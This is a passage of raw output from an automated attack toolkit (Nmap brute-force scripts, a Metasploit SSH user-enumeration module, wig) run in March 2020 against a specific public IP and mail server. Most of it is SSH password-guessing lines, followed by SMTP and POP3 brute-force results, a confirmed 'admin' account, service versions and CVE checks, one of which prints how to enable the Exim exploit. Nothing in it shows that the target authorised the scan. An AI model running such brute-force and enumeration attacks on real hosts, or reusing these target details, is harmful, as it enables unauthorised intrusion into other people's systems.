4700NSE: [ssh-brute] Trying username/password pair: sysadmin:
4701NSE: [ssh-brute] Trying username/password pair: netadmin:
4702NSE: [ssh-brute] Trying username/password pair: guest:
4703NSE: [ssh-brute] Trying username/password pair: user:
4704NSE: [ssh-brute] Trying username/password pair: web:
4705NSE: [ssh-brute] Trying username/password pair: test:
4706NSE: [ssh-brute] Trying username/password pair: root:123456
4707NSE: [ssh-brute] Trying username/password pair: admin:123456
4708NSE: [ssh-brute] Trying username/password pair: administrator:123456
4709NSE: [ssh-brute] Trying username/password pair: webadmin:123456
4710NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
4711NSE: [ssh-brute] Trying username/password pair: netadmin:123456
4712NSE: [ssh-brute] Trying username/password pair: guest:123456
4713NSE: [ssh-brute] Trying username/password pair: user:123456
4714NSE: [ssh-brute] Trying username/password pair: web:123456
4715NSE: [ssh-brute] Trying username/password pair: test:123456
4716NSE: [ssh-brute] Trying username/password pair: root:12345
4717NSE: [ssh-brute] Trying username/password pair: admin:12345
4718NSE: [ssh-brute] Trying username/password pair: administrator:12345
4719NSE: [ssh-brute] Trying username/password pair: webadmin:12345
4720NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
4721NSE: [ssh-brute] Trying username/password pair: netadmin:12345
4722NSE: [ssh-brute] Trying username/password pair: guest:12345
4723NSE: [ssh-brute] Trying username/password pair: user:12345
4724NSE: [ssh-brute] Trying username/password pair: web:12345
4725NSE: [ssh-brute] Trying username/password pair: test:12345
4726NSE: [ssh-brute] Trying username/password pair: root:123456789
4727NSE: [ssh-brute] Trying username/password pair: admin:123456789
4728NSE: [ssh-brute] Trying username/password pair: administrator:123456789
4729NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
4730NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
4731NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
4732NSE: [ssh-brute] Trying username/password pair: guest:123456789
4733NSE: [ssh-brute] Trying username/password pair: user:123456789
4734NSE: [ssh-brute] Trying username/password pair: web:123456789
4735NSE: [ssh-brute] Trying username/password pair: test:123456789
4736NSE: [ssh-brute] Trying username/password pair: root:password
4737NSE: [ssh-brute] Trying username/password pair: admin:password
4738NSE: [ssh-brute] Trying username/password pair: administrator:password
4739NSE: [ssh-brute] Trying username/password pair: webadmin:password
4740NSE: [ssh-brute] Trying username/password pair: sysadmin:password
4741NSE: [ssh-brute] Trying username/password pair: netadmin:password
4742NSE: [ssh-brute] Trying username/password pair: guest:password
4743NSE: [ssh-brute] Trying username/password pair: user:password
4744NSE: [ssh-brute] Trying username/password pair: web:password
4745NSE: [ssh-brute] Trying username/password pair: test:password
4746NSE: [ssh-brute] Trying username/password pair: root:iloveyou
4747NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
4748NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
4749NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
4750NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
4751NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
4752NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
4753NSE: [ssh-brute] Trying username/password pair: user:iloveyou
4754NSE: [ssh-brute] Trying username/password pair: web:iloveyou
4755NSE: [ssh-brute] Trying username/password pair: test:iloveyou
4756NSE: [ssh-brute] Trying username/password pair: root:princess
4757NSE: [ssh-brute] Trying username/password pair: admin:princess
4758NSE: [ssh-brute] Trying username/password pair: administrator:princess
4759NSE: [ssh-brute] Trying username/password pair: webadmin:princess
4760NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
4761NSE: [ssh-brute] Trying username/password pair: netadmin:princess
4762NSE: [ssh-brute] Trying username/password pair: guest:princess
4763NSE: [ssh-brute] Trying username/password pair: user:princess
4764NSE: [ssh-brute] Trying username/password pair: web:princess
4765NSE: [ssh-brute] Trying username/password pair: test:princess
4766NSE: [ssh-brute] Trying username/password pair: root:12345678
4767NSE: [ssh-brute] Trying username/password pair: admin:12345678
4768NSE: [ssh-brute] Trying username/password pair: administrator:12345678
4769NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
4770NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
4771NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
4772NSE: [ssh-brute] Trying username/password pair: guest:12345678
4773NSE: [ssh-brute] Trying username/password pair: user:12345678
4774NSE: [ssh-brute] Trying username/password pair: web:12345678
4775NSE: [ssh-brute] Trying username/password pair: test:12345678
4776NSE: [ssh-brute] Trying username/password pair: root:1234567
4777NSE: [ssh-brute] Trying username/password pair: admin:1234567
4778NSE: [ssh-brute] Trying username/password pair: administrator:1234567
4779NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
4780NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
4781NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
4782NSE: [ssh-brute] Trying username/password pair: guest:1234567
4783NSE: [ssh-brute] Trying username/password pair: user:1234567
4784NSE: [ssh-brute] Trying username/password pair: web:1234567
4785NSE: [ssh-brute] Trying username/password pair: test:1234567
4786NSE: [ssh-brute] Trying username/password pair: root:abc123
4787NSE: [ssh-brute] Trying username/password pair: admin:abc123
4788NSE: [ssh-brute] Trying username/password pair: administrator:abc123
4789NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
4790NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
4791NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
4792NSE: [ssh-brute] Trying username/password pair: guest:abc123
4793NSE: [ssh-brute] Trying username/password pair: user:abc123
4794NSE: [ssh-brute] Trying username/password pair: web:abc123
4795NSE: [ssh-brute] Trying username/password pair: test:abc123
4796NSE: [ssh-brute] Trying username/password pair: root:nicole
4797NSE: [ssh-brute] Trying username/password pair: admin:nicole
4798NSE: [ssh-brute] Trying username/password pair: administrator:nicole
4799NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
4800NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
4801NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
4802NSE: [ssh-brute] Trying username/password pair: guest:nicole
4803NSE: [ssh-brute] Trying username/password pair: user:nicole
4804NSE: [ssh-brute] Trying username/password pair: web:nicole
4805NSE: [ssh-brute] Trying username/password pair: test:nicole
4806NSE: [ssh-brute] Trying username/password pair: root:daniel
4807NSE: [ssh-brute] Trying username/password pair: admin:daniel
4808NSE: [ssh-brute] Trying username/password pair: administrator:daniel
4809NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
4810NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
4811NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
4812NSE: [ssh-brute] Trying username/password pair: guest:daniel
4813NSE: [ssh-brute] Trying username/password pair: user:daniel
4814NSE: [ssh-brute] Trying username/password pair: web:daniel
4815NSE: [ssh-brute] Trying username/password pair: test:daniel
4816NSE: [ssh-brute] Trying username/password pair: root:monkey
4817NSE: [ssh-brute] Trying username/password pair: admin:monkey
4818NSE: [ssh-brute] Trying username/password pair: administrator:monkey
4819NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
4820NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
4821NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
4822NSE: [ssh-brute] Trying username/password pair: guest:monkey
4823NSE: [ssh-brute] Trying username/password pair: user:monkey
4824NSE: [ssh-brute] Trying username/password pair: web:monkey
4825NSE: [ssh-brute] Trying username/password pair: test:monkey
4826NSE: [ssh-brute] Trying username/password pair: root:babygirl
4827NSE: [ssh-brute] Trying username/password pair: admin:babygirl
4828NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
4829NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
4830NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
4831NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
4832NSE: [ssh-brute] Trying username/password pair: guest:babygirl
4833NSE: [ssh-brute] Trying username/password pair: user:babygirl
4834NSE: [ssh-brute] Trying username/password pair: web:babygirl
4835NSE: [ssh-brute] Trying username/password pair: test:babygirl
4836NSE: [ssh-brute] Trying username/password pair: root:qwerty
4837NSE: [ssh-brute] Trying username/password pair: admin:qwerty
4838NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
4839NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
4840NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
4841NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
4842NSE: [ssh-brute] Trying username/password pair: guest:qwerty
4843NSE: [ssh-brute] Trying username/password pair: user:qwerty
4844NSE: [ssh-brute] Trying username/password pair: web:qwerty
4845NSE: [ssh-brute] Trying username/password pair: test:qwerty
4846NSE: [ssh-brute] Trying username/password pair: root:lovely
4847NSE: [ssh-brute] Trying username/password pair: admin:lovely
4848NSE: [ssh-brute] Trying username/password pair: administrator:lovely
4849NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
4850NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
4851NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
4852NSE: [ssh-brute] Trying username/password pair: guest:lovely
4853NSE: [ssh-brute] Trying username/password pair: user:lovely
4854NSE: [ssh-brute] Trying username/password pair: web:lovely
4855NSE: [ssh-brute] Trying username/password pair: test:lovely
4856NSE: [ssh-brute] Trying username/password pair: root:654321
4857NSE: [ssh-brute] Trying username/password pair: admin:654321
4858NSE: [ssh-brute] Trying username/password pair: administrator:654321
4859NSE: [ssh-brute] Trying username/password pair: webadmin:654321
4860NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
4861NSE: [ssh-brute] Trying username/password pair: netadmin:654321
4862NSE: [ssh-brute] Trying username/password pair: guest:654321
4863NSE: [ssh-brute] Trying username/password pair: user:654321
4864NSE: [ssh-brute] Trying username/password pair: web:654321
4865NSE: [ssh-brute] Trying username/password pair: test:654321
4866NSE: [ssh-brute] Trying username/password pair: root:michael
4867NSE: [ssh-brute] Trying username/password pair: admin:michael
4868NSE: [ssh-brute] Trying username/password pair: administrator:michael
4869NSE: [ssh-brute] Trying username/password pair: webadmin:michael
4870NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
4871NSE: [ssh-brute] Trying username/password pair: netadmin:michael
4872NSE: [ssh-brute] Trying username/password pair: guest:michael
4873NSE: [ssh-brute] Trying username/password pair: user:michael
4874NSE: [ssh-brute] Trying username/password pair: web:michael
4875NSE: [ssh-brute] Trying username/password pair: test:michael
4876NSE: [ssh-brute] Trying username/password pair: root:jessica
4877NSE: [ssh-brute] Trying username/password pair: admin:jessica
4878NSE: [ssh-brute] Trying username/password pair: administrator:jessica
4879NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
4880NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
4881NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
4882NSE: [ssh-brute] Trying username/password pair: guest:jessica
4883NSE: [ssh-brute] Trying username/password pair: user:jessica
4884NSE: [ssh-brute] Trying username/password pair: web:jessica
4885NSE: [ssh-brute] Trying username/password pair: test:jessica
4886NSE: [ssh-brute] Trying username/password pair: root:111111
4887NSE: [ssh-brute] Trying username/password pair: admin:111111
4888NSE: [ssh-brute] Trying username/password pair: administrator:111111
4889NSE: [ssh-brute] Trying username/password pair: webadmin:111111
4890NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
4891NSE: [ssh-brute] Trying username/password pair: netadmin:111111
4892NSE: [ssh-brute] Trying username/password pair: guest:111111
4893NSE: [ssh-brute] Trying username/password pair: user:111111
4894NSE: [ssh-brute] Trying username/password pair: web:111111
4895NSE: [ssh-brute] Trying username/password pair: test:111111
4896NSE: [ssh-brute] Trying username/password pair: root:ashley
4897NSE: [ssh-brute] Trying username/password pair: admin:ashley
4898NSE: [ssh-brute] Trying username/password pair: administrator:ashley
4899NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
4900NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
4901NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
4902NSE: [ssh-brute] Trying username/password pair: guest:ashley
4903NSE: [ssh-brute] Trying username/password pair: user:ashley
4904NSE: [ssh-brute] Trying username/password pair: web:ashley
4905NSE: [ssh-brute] Trying username/password pair: test:ashley
4906NSE: [ssh-brute] Trying username/password pair: root:000000
4907NSE: [ssh-brute] Trying username/password pair: admin:000000
4908NSE: [ssh-brute] Trying username/password pair: administrator:000000
4909NSE: [ssh-brute] Trying username/password pair: webadmin:000000
4910NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
4911NSE: [ssh-brute] Trying username/password pair: netadmin:000000
4912NSE: [ssh-brute] Trying username/password pair: guest:000000
4913NSE: [ssh-brute] Trying username/password pair: user:000000
4914NSE: [ssh-brute] Trying username/password pair: web:000000
4915NSE: [ssh-brute] Trying username/password pair: test:000000
4916NSE: [ssh-brute] Trying username/password pair: root:iloveu
4917NSE: [ssh-brute] Trying username/password pair: admin:iloveu
4918NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
4919NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
4920NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
4921NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
4922NSE: [ssh-brute] Trying username/password pair: guest:iloveu
4923NSE: [ssh-brute] Trying username/password pair: user:iloveu
4924NSE: [ssh-brute] Trying username/password pair: web:iloveu
4925NSE: [ssh-brute] Trying username/password pair: test:iloveu
4926NSE: [ssh-brute] Trying username/password pair: root:michelle
4927NSE: [ssh-brute] Trying username/password pair: admin:michelle
4928NSE: [ssh-brute] Trying username/password pair: administrator:michelle
4929NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
4930NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
4931NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
4932NSE: [ssh-brute] Trying username/password pair: guest:michelle
4933NSE: [ssh-brute] Trying username/password pair: user:michelle
4934NSE: [ssh-brute] Trying username/password pair: web:michelle
4935NSE: [ssh-brute] Trying username/password pair: test:michelle
4936NSE: [ssh-brute] Trying username/password pair: root:tigger
4937NSE: [ssh-brute] Trying username/password pair: admin:tigger
4938NSE: [ssh-brute] Trying username/password pair: administrator:tigger
4939NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
4940NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
4941NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
4942NSE: [ssh-brute] Trying username/password pair: guest:tigger
4943NSE: [ssh-brute] Trying username/password pair: user:tigger
4944NSE: [ssh-brute] Trying username/password pair: web:tigger
4945NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
4946NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
4947NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
4948Nmap scan report for 199.38.245.243
4949Host is up (0.24s latency).
4950
4951PORT STATE SERVICE VERSION
495222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
4953| ssh-auth-methods:
4954| Supported authentication methods:
4955| publickey
4956| gssapi-keyex
4957| gssapi-with-mic
4958|_ password
4959| ssh-brute:
4960| Accounts: No valid accounts found
4961|_ Statistics: Performed 259 guesses in 181 seconds, average tps: 1.3
4962| ssh-hostkey:
4963| 1024 1a:0d:eb:77:2b:24:04:b9:fb:ff:06:3a:d3:de:0b:fc (DSA)
4964|_ 2048 59:7a:97:24:cd:1c:5a:3a:87:31:41:1d:60:aa:27:dc (RSA)
4965| ssh-publickey-acceptance:
4966|_ Accepted Public Keys: No public keys accepted
4967|_ssh-run: Failed to specify credentials and command to run.
4968Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4969Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%), Infomir MAG-250 set-top box (89%)
4970No exact OS matches for host (test conditions non-ideal).
4971Network Distance: 15 hops
4972
4973TRACEROUTE (using port 22/tcp)
4974HOP RTT ADDRESS
49751 134.06 ms 10.203.41.1
49762 ...
49773 135.26 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
49784 134.69 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
49795 140.26 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
49806 159.52 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
49817 164.53 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
49828 234.34 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
49839 234.41 ms be2490.ccr42.jfk02.atlas.cogentco.com (154.54.42.85)
498410 237.01 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
498511 ... 14
498615 237.15 ms 199.38.245.243
4987#################################################################################################################################
4988USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
4989RHOSTS => 199.38.245.243
4990RHOST => 199.38.245.243
4991[*] 199.38.245.243:22 - SSH - Using malformed packet technique
4992[*] 199.38.245.243:22 - SSH - Starting scan
4993[+] 199.38.245.243:22 - SSH - User 'admin' found
4994[-] 199.38.245.243:22 - SSH - User 'administrator' not found
4995[-] 199.38.245.243:22 - SSH - User 'anonymous' not found
4996[-] 199.38.245.243:22 - SSH - User 'backup' not found
4997[-] 199.38.245.243:22 - SSH - User 'bee' not found
4998[-] 199.38.245.243:22 - SSH - User 'ftp' not found
4999[-] 199.38.245.243:22 - SSH - User 'guest' not found
5000[-] 199.38.245.243:22 - SSH - User 'GUEST' not found
5001[-] 199.38.245.243:22 - SSH - User 'info' not found
5002[-] 199.38.245.243:22 - SSH - User 'mail' not found
5003[-] 199.38.245.243:22 - SSH - User 'mailadmin' not found
5004[*] Scanned 1 of 1 hosts (100% complete)
5005[*] Auxiliary module execution completed
5006#################################################################################################################################
5007Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:54 EDT
5008NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
5009NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
5010NSE: [smtp-brute] passwords: Time limit 3m00s exceeded.
5011Nmap scan report for 199.38.245.243
5012Host is up (0.24s latency).
5013
5014PORT STATE SERVICE VERSION
501525/tcp open smtp Exim smtpd 4.92
5016| smtp-brute:
5017| Accounts: No valid accounts found
5018|_ Statistics: Performed 1685 guesses in 181 seconds, average tps: 9.0
5019| smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
5020|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
5021| smtp-enum-users:
5022|_ Couldn't find any accounts
5023|_smtp-open-relay: SMTP RSET: failed to receive data: connection closed
5024| smtp-vuln-cve2010-4344:
5025| Exim version: 4.92
5026| Exim heap overflow vulnerability (CVE-2010-4344):
5027| Exim (CVE-2010-4344): NOT VULNERABLE
5028| Exim privileges escalation vulnerability (CVE-2010-4345):
5029| Exim (CVE-2010-4345): NOT VULNERABLE
5030|_ To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit'
5031Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5032Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.39 - 3.2 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%)
5033No exact OS matches for host (test conditions non-ideal).
5034Network Distance: 16 hops
5035Service Info: Host: server.18they.com
5036
5037TRACEROUTE (using port 25/tcp)
5038HOP RTT ADDRESS
50391 135.62 ms 10.203.41.1
50402 ...
50413 136.73 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
50424 136.09 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
50435 137.80 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
50446 153.09 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
50457 164.73 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
50468 241.35 ms be12265.ccr41.par01.atlas.cogentco.com (130.117.2.142)
50479 241.33 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
504810 237.16 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
504911 246.32 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
505012 ... 15
505116 245.68 ms 199.38.245.243
5052#################################################################################################################################
5053Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:00 EDT
5054Nmap scan report for 199.38.245.243
5055Host is up (0.24s latency).
5056
5057PORT STATE SERVICE VERSION
505853/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
5059|_dns-fuzz: Server didn't response to our probe, can't fuzz
5060|_dns-nsec-enum: Can't determine domain for host 199.38.245.243; use dns-nsec-enum.domains script arg.
5061|_dns-nsec3-enum: Can't determine domain for host 199.38.245.243; use dns-nsec3-enum.domains script arg.
5062| dns-nsid:
5063|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
5064Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5065Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.39 - 3.2 (89%), Linux 3.1 - 3.2 (89%), Linux 3.2 - 4.9 (89%)
5066No exact OS matches for host (test conditions non-ideal).
5067Network Distance: 15 hops
5068Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
5069
5070Host script results:
5071|_dns-brute: Can't guess domain of "199.38.245.243"; use dns-brute.domain script argument.
5072
5073TRACEROUTE (using port 53/tcp)
5074HOP RTT ADDRESS
50751 135.88 ms 10.203.41.1
50762 ...
50773 136.46 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
50784 135.93 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
50795 138.47 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
50806 152.68 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
50817 161.72 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
50828 238.17 ms be12265.ccr41.par01.atlas.cogentco.com (130.117.2.142)
50839 238.27 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
508410 239.79 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
508511 ... 14
508615 248.46 ms 199.38.245.243
5087#################################################################################################################################
5088Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:00 EDT
5089Nmap scan report for 199.38.245.243
5090Host is up (0.25s latency).
5091
5092PORT STATE SERVICE VERSION
509367/tcp closed dhcps
509467/udp open|filtered dhcps
5095|_dhcp-discover: ERROR: Script execution failed (use -d to debug)
5096Too many fingerprints match this host to give specific OS details
5097Network Distance: 16 hops
5098
5099TRACEROUTE (using port 67/tcp)
5100HOP RTT ADDRESS
51011 136.98 ms 10.203.41.1
51022 ...
51033 137.81 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
51044 137.85 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
51055 143.66 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
51066 161.74 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
51077 170.27 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
51088 247.71 ms be12265.ccr41.par01.atlas.cogentco.com (130.117.2.142)
51099 245.01 ms be2317.ccr41.jfk02.atlas.cogentco.com (154.54.30.185)
511010 244.40 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
511111 ... 15
511216 248.51 ms 199.38.245.243
5113#################################################################################################################################
5114Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:02 EDT
5115Nmap scan report for 199.38.245.243
5116Host is up (0.25s latency).
5117
5118PORT STATE SERVICE VERSION
511968/tcp closed dhcpc
512068/udp open|filtered dhcpc
5121Too many fingerprints match this host to give specific OS details
5122Network Distance: 15 hops
5123
5124TRACEROUTE (using port 68/tcp)
5125HOP RTT ADDRESS
51261 131.43 ms 10.203.41.1
51272 ...
51283 132.45 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
51294 132.10 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
51305 138.86 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
51316 155.88 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
51327 164.29 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
51338 235.31 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
51349 237.72 ms be2490.ccr42.jfk02.atlas.cogentco.com (154.54.42.85)
513510 243.14 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
513611 ... 14
513715 239.70 ms 199.38.245.243
5138#################################################################################################################################
5139Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:04 EDT
5140Nmap scan report for 199.38.245.243
5141Host is up (0.24s latency).
5142
5143PORT STATE SERVICE VERSION
514469/tcp closed tftp
514569/udp open|filtered tftp
5146Too many fingerprints match this host to give specific OS details
5147Network Distance: 15 hops
5148
5149TRACEROUTE (using port 69/tcp)
5150HOP RTT ADDRESS
51511 130.60 ms 10.203.41.1
51522 ...
51533 131.37 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
51544 131.05 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
51555 137.84 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
51566 155.60 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
51577 163.85 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
51588 241.00 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
51599 237.16 ms be2490.ccr42.jfk02.atlas.cogentco.com (154.54.42.85)
516010 241.11 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
516111 ... 14
516215 243.51 ms 199.38.245.243
5163#################################################################################################################################
5164
5165wig - WebApp Information Gatherer
5166
5167
5168Scanning http://199.38.245.243...
5169_________________ SITE INFO __________________
5170IP Title
5171199.38.245.243
5172
5173__________________ VERSION ___________________
5174Name Versions Type
5175Roundcube CMS
5176Apache 2 Platform
5177PHP 7.2.19 Platform
5178
5179______________________________________________
5180Time: 26.1 sec Urls: 383 Fingerprints: 40401
5181#################################################################################################################################
5182HTTP/1.1 200 OK
5183Date: Thu, 19 Mar 2020 01:13:20 GMT
5184Server: Apache/2
5185Last-Modified: Tue, 04 Jun 2019 16:48:56 GMT
5186ETag: "2c-58a8241b959a8"
5187Accept-Ranges: bytes
5188Content-Length: 44
5189Vary: User-Agent
5190Content-Type: text/html
5191
5192HTTP/1.1 200 OK
5193Date: Thu, 19 Mar 2020 01:13:20 GMT
5194Server: Apache/2
5195Last-Modified: Tue, 04 Jun 2019 16:48:56 GMT
5196ETag: "2c-58a8241b959a8"
5197Accept-Ranges: bytes
5198Content-Length: 44
5199Vary: User-Agent
5200Content-Type: text/html
5201#################################################################################################################################
5202Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:07 EDT
5203NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
5204NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
5205NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
5206Nmap scan report for 199.38.245.243
5207Host is up (0.24s latency).
5208
5209PORT STATE SERVICE VERSION
5210110/tcp open pop3 Dovecot DirectAdmin pop3d
5211| pop3-brute:
5212| Accounts: No valid accounts found
5213|_ Statistics: Performed 205 guesses in 184 seconds, average tps: 1.0
5214|_pop3-capabilities: USER SASL(PLAIN) TOP PIPELINING UIDL RESP-CODES STLS AUTH-RESP-CODE CAPA
5215Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5216Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.1 - 3.2 (89%)
5217No exact OS matches for host (test conditions non-ideal).
5218Network Distance: 15 hops
5219
5220TRACEROUTE (using port 110/tcp)
5221HOP RTT ADDRESS
52221 134.00 ms 10.203.41.1
52232 ...
52243 134.86 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
52254 134.85 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
52265 140.24 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
52276 158.64 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
52287 167.03 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
